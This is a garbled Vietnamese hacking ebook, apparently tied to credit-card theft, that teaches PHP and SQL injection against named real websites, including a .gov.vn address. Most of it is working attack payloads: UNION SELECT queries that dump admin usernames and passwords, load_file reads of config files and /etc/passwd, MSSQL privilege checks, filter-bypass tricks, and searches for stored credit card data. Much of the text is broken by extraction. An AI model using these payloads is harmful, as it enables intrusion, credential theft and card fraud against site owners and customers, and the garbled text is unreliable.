Thông tin tài liệu
It’s a special version which the title
will be:
Hieupc Returns
Copyright ® by hieupc
Email:
hieupc@gmail.com
Yahoo ID
: hieuitpc
Châm ngôn: ,
. , .
: 09-09-2009
: Hieupc
Page 1
-
:
, 4 ,
. tvi tính,
, ,
. L
máy vi tính, ,
.
.
ngày hôm nay, ,
.
,
Ebook này. , , ,
.
P/S:
nó nhé. :
hieupc@gmail.com.
My Friends: Ly0kha, PxNam, J0hnnywalk3r, Yeuemdaikho, Kehieuhoc, Langtuhaohoa,
Mr.saobang, Vampirevn, Thanhhuyleit, Thanhh83, Longnhi……………
Chú ý: Trong là
.
Page 2
T
–
: Page
I. Exploiting PHP Injection: 4
1. PHP Injection là gì? 4
2. . 4 - 16
II. Getting Root Server by Many Methods: 17
1. MYSQL Server. 17 - 24
2. SA MSSQL Server. 25 - 37
3. ack. 38 - 48
III. How To Get These Important Information: 49
1. . 49 - 50
2. . 51 - 53
IV. Exploiting By Tool, Scripts: 54
1. Shell Scripts. 54
2. Tools Hack. 54
V. Speacial Things: 55
1. ng dn cách c phc khác. 55 - 64
2. . 65 - 68
3. Thc tp SQL Injection. 69
Page 3
–
I. Exploiting PHP Injection:
1. PHP Injection là gì:
PHP Injection xét vmà m
th giá tr.
vào có th
:
$myvar = 'somevalue';
$x = $_GET['arg'];
eval('$myvar = ' . $x . ';');
<?php
$color = 'blue';
if (__isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
2. :
SQL Injection lc khai thác da vào quá trình trao i d liu gii dùng và
Web Application. Vic ng dng không kim tra các giá tr n attacker có th cho
thc thi các SQL query không mong mun can thii, thêm, xem hay
xóa các d liu.
ng khai thác bng các gi các giá tr server sinh các thông tin l t
tùy bin theo câu truy vn gc ci thit k.
Nc customize các trang li hay các trang li không tr v, phi làm th
nào? Hãy th khai thác vc: blind sql injection.
Ví d:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1
Kt qu tr v là thông tin t.
:
‘ .
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1
’
1 .
Page 4
–
Tùy bin 1:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 and 1=1
=>Trang web tr v database
Tùy bin 2:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 and 1=2
=> Không sn phm nào xut hin.
Vy ta nhn thy t qu tr v ca trang web khác nhau. Vi tùy biu
kin 1=1 (true) s không làm n kt qu ca câu truy vn gc nên vn hi
tùy bin 2: 1=2 (false) thêm vào, câu truy vn gc s
b tr kt qu v false dn không xut hin thông tin trên trang web. Dm này ta có
th dùng các truy vn ni vào sao cho kt qu nh ly thông tin v h thng!
Gi s chúng ta không bing và bng ca ng dng web này là gì?
Vi li SQL Injection gây ra bi url trên ta xem th truy vn (SQL) ca nó liu có bao nhiu
ng. S du này bi vì khi chúng ta dùng UNION trong câu lnh SQL thì s
ng ca hai câu lnh select phi trùng nhau.
nhanh
.
ng truy vn vi url:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1
Có rt nhi thc hin. ình s dng order by <num>. Thc hin
<num>. Khi thc hin order by <num>, nu trang web không hin th li tc là s ng
vn còn, thc hin khi nào xut hin li tã thc hin tìm s
ng.
:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 1 ->
:
Page 5
–
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 2 -> .
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 10 -> , .
10 :
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 7 ->
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 8 -> ,
sao, 7 8 .
Suy ra: 7 mà chúng .
y truy vn SQL vng (field)
u tra phiên bn SQL, User… vi lnh sau:
:
:
- nhé
: 4.5 5.0 mò table và column.
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=
-
1%20union%20select%201,2,3,4,5,6,7
: : (, 3 4)
m tra SQL Version xem sao:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=
-1%20union%20select%201,2,version(),4,5,6,7
Page 6
–
: (5.0, _name hay
column_.)
Và c, : version() , user()
, database() , @@datadir , group_concat(schema_name) , table_schema ,
… +from+information_schema.schemata
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=
-1%20union%20select%201,2,user(),4,5,6,7
:
: concat_ws(0x3a,version(),user(),database())
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=
-
1%20union%20select%201,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7
:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=
-
1%20union%20select%201,2,group_concat(table_name),4,5,6,7%20from%20information_schema.tables
: , , , .
Page 7
–
thêm: unhex(hex( _concat nhé. :
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=
-
1%20union%20select%201,2,unhex(hex(group_concat(table_name))),4,5,6,7%20from%20information_schema.t
ables
:
Trong PHP Hex table
: admin, users, accounts….Hex vì Magic_Quotes : ON
Sau khi, , : admin.
thác xem sao: (table: admin : 61646d696e)
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=
-
1%20union%20select%201,2,unhex(hex(group_concat(column_name))),4,5,6,7%20from%20information_schem
a.columns where table_name=
0x61646d696e
"
0x” hex nhé. unhex(hex( ,
unhex(hex( .
:
: 2 : username, pass : admin
:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=
-
1%20union%20select%201,2,unhex(hex(group_concat(username,0x7c,pass))),4,5,6,7%20from%20admin
Page 8
–
:
:
Username: cuongle
Pass: cuongle
… .
:
0x7c
| , . Khi
là: admin .
, .
: (: admin, pcadmin, admin_login, admin.php….)
, :
http://www.hoanvustc.com/manager/ xem sao.
: ()
Page 9
-
:
Trong vic khai thác blind sql injection mt s hàm sau t ra hu ích:
1. SUBSTRING(string,v trí, s ng): Hàm ct chui
vd:
SUBSTRING('dbo', 1, 1) = ‘d’
SUBSTRING('dbo', 2, 1) = ‘b’
SUBSTRING('dbo', 3, 1) = ‘o’
2. Lower(): chuyn ký t sang ch ng
3. Upper(): chuyn ký t sang ch HOA
4. ASCII(): chuyn ký t sang s ng mã ascii
Ngoài ra chú ý thêm:
- :
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in
C:\ on line 37
- : Union select all, Union all select…
- table_schema tables table_schema .
http://www.website.com/shop.php?id=1+UNION+SELECT+
1,group_concat(table_name),3,4
+from+information_schema.tables+where+table_schema=hie
upc— ( nhé.)
-
: CC, Information, user, pass….
().
-
: union, select, convert….
. : UnIoN SelECt…
-
: credit card number,
****,
unhide…(
).
-
, :
Page 10
[...]... char(67,58,92,80,1 14, 111,103,1 14, 97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81,76,83,101,1 14, 1 18,101,1 14, 53 ,46 ,48 ,92,68,97,116,97,92,99,111,110,102,105,103 ,46 ,112,1 04, 112) (chú ý: user = muu , muu = CHAR(109, 117, 117) ): union all select 1,2,3,load_file(char(67,58,92,80,1 14, 111,103,1 14, 97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81, 76,83,101,1 14, 118,101,1 14, 53 ,46 ,48 ,92,68,97,116,97,92,99,111,110,102,105,103 ,46 ,112,1 04, 112)),5,6,7,8,9,10,11,... 1,2,substr(group_concat(table_name),100,300),3 ,4, 5… dành cho site.com/index.php?id=-1 union select 1,2, unhex(hex(substr(group_concat(table_name),100,300))),3 ,4, 5… 100 lên 200 300… tin LIMIT 1 OFFSET 44 có , 44 45 , 46 là tables : ‘ union select 1,2,3 ,4, 5,6,7,concat(table_name,0×7c,table_schema,0×7c),9,10,11,12,13, 14, 15,16,17,18,19 FROM information_schema.tables LIMIT 1 OFFSET 44 - Tu nhau, ví d : khác Microsoft... select 1,2,3 ,4, 5,6,7,database(),9,10,11,12,13, 14, 15,16,17,18,19— : ‘ union select 1,2,3 ,4, 5,6,7 ,version( ),9,10,11,12,13, 14, 15,16,17,18,19— : (SQL Version trên 5 nhé, ) ‘ union select 1,2,3 ,4, 5,6,7,user(),9,10,11,12,13, 14, 15,16,17,18,19— : ‘ union select 1,2,3 ,4, 5,6,7,@@datadir,9,10,11,12,13, 14, 15,16,17,18,19– Database : "/var/lib/mysql/ " Page 17 ta a MYSQL USER xem sao ( ): ‘ union select 1,2,3 ,4, 5,6,7,update_priv,9,10,11,12,13, 14, 15,16,17,18,19... 1,2,3 ,4, 5,6,7,update_priv,9,10,11,12,13, 14, 15,16,17,18,19 from mysql.user– ‘ union select 1,2,3 ,4, 5,6,7,file_priv,9,10,11,12,13, 14, 15,16,17,18,19 from mysql.user– ‘ union select 1,2,3 ,4, 5,6,7,select_priv,9,10,11,12,13, 14, 15,16,17,18,19 from mysql.user– , , : sql là: muu ta sang Ascii là: CHAR(109, 117, 117) (muu : muu = 0x6d7575 ‘ union select 1,2,3 ,4, 5,6,7,select_priv,9,10,11,12,13, 14, 15,16,17,18,19 from mysql.user... 1,2,3,load_file(char(67,58,92,80,1 14, 111,103,1 14, 97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81, 76,83,101,1 14, 118,101,1 14, 53 ,46 ,48 ,92,68,97,116,97,92,99,111,110,102,105,103 ,46 ,112,1 04, 112)),5,6,7,8,9,10,11, 12,13, 14, 15,16,17,18,19,20,21,22,23, 24, 25,26,27,28,29,30,31 from mysql.user where user=CHAR(109, 117, 117) Page 20 : , , cái này lên google MySQL Query Browser ( Nhìn hìn , : ): : tblcart_payment , Drop,... Insert thông tin…………May m (Cpanel Root), : Page 21 Check xem Shop này có CC không nào ( ): , , : : Ngoài ra, load_file : /etc/passwd : ‘ union select 1,2,3 ,4, 5,6,7,load_file(CHAR (47 , 101, 116, 99, 47 , 112, 97, 115, 115, 119, 100)),9,10,11,12,13, 14, 15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)– Page 22 (chú ý: etc/password và user= muu sang mã Ascii nhé): view : /etc/shadow , , crack... (current_date))) Page 24 2 SA MSSQL Server: VN 1 server ) Thông : GOV.VN ( ‘ hay : : http://www.hieupc.gov.vn/hieupc.asp?id=1/**/and/**/1=convert%28int,@@servername%2bchar(1 24) %2bdb_na me()%2bchar(1 24) %2bsystem_user%2bchar(1 24) %2b@ @version) sp_password : Ki m tra xem System_User hi n t i có quy n ngang = SA không: tên là 'SA ng System_user có quy n ngang = SA ng b qua b n ki m tra xem System_user không... char(97,100,109,105,110) : - M t chút v b ng mã ASCII: B kí t ASCII g m 256 kí t + 32 kí t u là các kí t 13) , ký t ESC ( mã 27) c phân b u khi n không + các mã 32 -47 ,58- 64, 91-96 và 123-127 là các kí t ch m ph y , d u ngo c , móc , h i c ví d c bi ENTER ( mã u ch m, + các mã 48 -57 là 10 ch s + các mã 65-90 là các ch cái hoa A->Z + các kí t 97-122 là các ch + các mã ASSCII là các kí t ng a->z h a b n các thông báo l i... mò table và column quan , scan tables hay columns 1,2,3 ,4, 5,6 : 1,1,1,1,1,1… Thay vì nh query SQL Injection - order by 1 thôi : http://vn.lge.com/index.php?option=products&task=productsdetails&id=1 order by 1 Order by 1 : , , : http://vn.lge.com/index.php?option=products&task=productsdetails&id=1%20union%20select%201,2,3 ,4, 5,6,7,8,9,10,11,12,13, 14 Page 12 : ‘sau - , , - L nh union c s d trong database...- MD5, có : http://www.th3-0utl4ws.com/tools/md5/md5_looker.php http://gdataonline.com/seekhash.php - , ch Bypass Login ( ) union+all+select… , + - : | : 0x7c : 2 sang Hex, ta vào trang web sau: http://www.string-functions.com/string-hex.aspx ( 0x -hex) : 61 646 d696e và sau khi thêm 0x : table: admin sau khi convert thì : 0x61 646 d696e, t convert sang Ascii thay vì convert sang . LIMIT 1 OFFSET 44 có
tin , 44 45 , 46 là tables
.:.
:
char(67,58,92,80,1 14, 111,103,1 14, 97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81,76,83,101,1 14, 1
18,101,1 14, 53 ,46 ,48 ,92,68,97,116,97,92,99,111,110,102,105,103 ,46 ,112,1 04, 112)
Ngày đăng: 27/01/2014, 13:20
Xem thêm: Tài liệu Ebook Hacking Credit Card Version 4 docx, Tài liệu Ebook Hacking Credit Card Version 4 docx